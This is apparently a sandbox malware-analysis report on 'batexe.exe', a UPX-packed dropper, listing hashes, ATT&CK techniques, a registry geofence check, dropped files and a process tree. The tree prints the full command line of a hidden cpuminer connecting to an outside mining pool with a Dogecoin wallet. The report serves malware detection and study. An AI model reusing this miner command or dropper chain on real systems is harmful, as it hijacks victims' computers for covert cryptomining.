73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
17-02-2024 12:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5168	b2e.exe
2588	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2588	cpuminer-sse2.exe
2588	cpuminer-sse2.exe
2588	cpuminer-sse2.exe
2588	cpuminer-sse2.exe
2588	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4164-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4164 wrote to memory of 5168	4164	batexe.exe	85
PID 4164 wrote to memory of 5168	4164	batexe.exe	85
PID 4164 wrote to memory of 5168	4164	batexe.exe	85
PID 5168 wrote to memory of 2540	5168	b2e.exe	86
PID 5168 wrote to memory of 2540	5168	b2e.exe	86
PID 5168 wrote to memory of 2540	5168	b2e.exe	86
PID 2540 wrote to memory of 2588	2540	cmd.exe	89
PID 2540 wrote to memory of 2588	2540	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4164
- C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6031.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2540
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe

Filesize
12.3MB

MD5
e91f8a81f519e6da3ab5ec5ac1fe1002

SHA1
847539c9a4c69f8b3d5cc303e186d3ded4f85f45

SHA256
8e6dfb1cc6a4dbca9c645baf828a42119b302a2aac1819e997af59b0c8f13040

SHA512
df0c23960bb5bd72a609465969920443b5335736b16825d4841d4925b4da14679ab6bbea0bd9a8857bbdfde3adf4ef2004519d9516804afd8c37dd67c87b98f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe

Filesize
3.0MB

MD5
db7dfdac1853dc10d3c45cf6f2aa21ef

SHA1
505080bc2daf254f9e4979ba146b2f39c38cb414

SHA256
d411ca9ff4cb61492401e54ea90266c21629d9d920769493dba8a49952abc126

SHA512
15d559a9266b5c349e9003b896d014573b9e0a4d74e3d2de4b7fdd650ff048ef7ff91f88ef7768bf832bb6320097ca2305e42940784204a7215b34d2982e9753

Download Submit
C:\Users\Admin\AppData\Local\Temp\5C2A.tmp\b2e.exe

Filesize
2.6MB

MD5
a1a1efda460cf156a581da6fbc7f2111

SHA1
f07ad9045e953746baa2cd3fbc1917483e9f495b

SHA256
dab4accac310c7437ba06c55a1898a2edfa7f3da23804aa312943180d588aa8d

SHA512
29aa0440bfffcb9a812df52cb15165f5379b45c137992d27a14281f1134dede79374fac64573672ca75094cc002d5418df2fc40e3a64bc54511e2ca5efdbad64

Download Submit
C:\Users\Admin\AppData\Local\Temp\6031.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
384KB

MD5
eb8ea4d2595402528f73410e2c8651ed

SHA1
23abb385032a9317d00c826eb21e0fe6fc802c50

SHA256
fc3c5c1787c58c465ea47ab132afc59d209b1f7d319ae80a7913ed5c39157017

SHA512
7f4485a662859bdec898bb4f9675c8a834ab570ae7f4df2b6e95a9f5ab45f8fba612d04f0edfe22dc4bdcd3011af0536ed200731262056cd7bec332ce4b18573

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
704KB

MD5
ce5f200d2d48a057722a957d5acc6426

SHA1
e7a8d4c0dc7b561dfa26e3fddaff015716187305

SHA256
cb450c8c0a952560f35f4b93f14357fc3856ee0b016eabf8bb4d20e9504d82df

SHA512
e7d3b203cc96d08b6d000f6845bbeb5777cd08babadbcb86266193ca68d8183973b3a92f5cf587df1f26bf04a182fa51001b7317c9a9e7ba868d1e26b897ee9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
448KB

MD5
19a61444b6e2d01755ede80960bca19c

SHA1
e0c7222784d3e2b3329ec3280648b17fd60ef209

SHA256
13fd488b38f3b75438e9ad0a033df005cd397f3c92f43275714a0a7eb3fb4db8

SHA512
bc02c82bdac19f10f3e3a93d3f507bb7838c9255b7cff5af6e3a7f3b471dae9c45c52728c3c23857b3402dd1702cb51a20f225a4da992c26a997c26d86b6b1d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
426KB

MD5
7d56bf99866e6acac58fd46ad61a8100

SHA1
daaa5b8b2aabf906471f0de65483ac1ba19f31fa

SHA256
41a7db242cefb9e9877dd54aaca8a3c703ada31f6c4a9729c838d7db5686e82d

SHA512
b16e29f55c7fdae81bfa377c14dd6217a44c3780548cf60a7c15a37253a35ded1a64f17e24dc37a4c919dd76b28e2f69f0d0780416b1bc010cc3c3ddfa8ada92

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
289KB

MD5
9dff1ab9a50010248a8704684ca132d8

SHA1
21cce3e8a4c61ab9894666ac14e72a50c6c2f005

SHA256
287f42627eb7afbdab932a77049acf25f2a562c94c3a8d2937ca50ceca41f7ec

SHA512
df620e392e76947238c8e538aa480b04a8857ecf379b48eeb06e0f6d2b2379be666bc66db502f20871465dcb5781cd607b992f94554cecd3fa67e507f5115288

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
704KB

MD5
538d0a2af59454daf4418e27268ec013

SHA1
dd5e047f232d3827ba6f9c1da4f17928557dd6e6

SHA256
ef618dca52a4f65f6fd72fd721744185c44cfeff6ff90928f56481969eab4126

SHA512
1c958d315013726aa6ebc24552fb4d712a30ad6e5621db0f9037924ccb8cdf45063a01ed6da3aa50485ad084248a9c67c3513aabecf9d324eacaaa2b75f0a7c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
475KB

MD5
1689cb5c6ab91e4ae9328e0f0653cc15

SHA1
e6a0d50dd6555d21841bb8a9e7d5532a71450ed9

SHA256
dc4ce257f30847451852d2ae0f198320ee649494f0b6f1861c35360cdd243f76

SHA512
7ddd9fa008ac7fc36d4283d7b522cf9b3a335c245c3679d2d810cc1c284f6deea58c56b95ed6c3f3c2b665c27b3313845bf4af81965dfb3b5bb5959b50919777

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
496KB

MD5
7dcc21124aa9e2cbcd885dc83bf56200

SHA1
7e543d3d65956b94dd3b1363604a0c375a982489

SHA256
9a0a2dab46658c31df73f2cbbf3ea577964bd7e45b7992f84f94fb07e26602c5

SHA512
a9666c8c6161238b25fba6a52bb41afc8dc59962f831227292fc6a63ade6fcfea6fed8debb194679e604f4671d28078243f6e2a36c00ad8098ff92c7f3108bfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
376KB

MD5
b5be9b54e10cbf0279ada20a76db3e40

SHA1
620838d4ce047cd7cb99e7360d60641002224fbd

SHA256
5abddec0fe1117e4c8a5868728c3911514aee99bad2b7b521d6a25a4ac6d6170

SHA512
2f5148bfd43dc4ca274a3c8721d4b569d67b93eacde1a3ed2af9e4da09ecd8d0a50484d81ff7e410e2267834eae9f16882a4b4f015e8f1bb08eff05921d577d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
403KB

MD5
457efe9e6523a48a2aa0c3a1ff6a727d

SHA1
b02e9fc577418d6ac36b0fdd6e90b57fa60345cf

SHA256
0d540414c69bb4fdb31e7bff8352de6d3f892ac896a2e742e61c7f381b65b9de

SHA512
22a2ccc18624322289539d79b26350ff01b7811357c89ec344c64ff65a6d21eae4e7d6381b8c74d7e701f74eacd8eea5cd08b0c26eb7a24e2c3a26c0d00a9aa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
388KB

MD5
a9cf8427e0ac6350ec2cef1d1480c9e2

SHA1
ec4de7c72735559f407a290af2be31fa0fb4fb31

SHA256
3354570243ae900900a58862543ea53eba62f0afb4202f0fc762c55465d4317e

SHA512
a18151e37e1e906f1be61c124cf31baad244df074954f96c584bd97a3db8c65d816b593cd7bc9790a5f60dae2165f6660de19001b02a87d89d256adbec122abc

Download Submit
memory/2588-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2588-46-0x0000000073350000-0x00000000733E8000-memory.dmp

Filesize
608KB

Download
memory/2588-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2588-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2588-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2588-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4164-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5168-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5168-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download